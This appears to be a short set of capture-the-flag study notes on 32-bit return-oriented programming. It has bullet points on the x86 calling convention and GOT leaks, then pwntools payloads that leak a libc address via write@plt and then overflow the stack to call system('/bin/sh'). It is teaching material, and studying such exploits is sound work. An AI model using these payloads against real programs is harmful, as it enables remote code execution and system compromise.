Pwnable - 32bit ROP

DocsPwnable
,
  • x86 calling convention
    • The caller places all arguments to the callee on the stack
    • Arguments are pushed to the stack
    • Stack cleanup is performed by the calle
  • rip control
  • /bin/sh\x00 address
  • leak the libc address. (e.g got)
  • got overwriting
  • argument control? -> pop [reg] ; ret gadget address (Role is to add esp)

Libc Leak

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
payload = b''
payload += b'A' * (0x88+0x4) # (dummy + ebp)

payload += p32(e.plt['write'])
payload += p32(pppr)
payload += p32(1)
payload += p32(e.got['write'])
payload += p32(4)

payload += p32(e.sym['main']) # ret2main

p.sendlineafter('Input:\n', payload)

leak = struct.unpack('I', p.recv(4))[0] 
info(hex(leak))

Execute system('/bin/sh\x00')

1
2
3
4
5
6
7
8
9
# restart main
payload = b''
payload += b'A' * (0x88+0x4) # (dummy + ebp)

payload += p32(system)
payload += b'B' * 0x4
payload += p32(binsh)

p.sendlineafter('Input:\n', payload)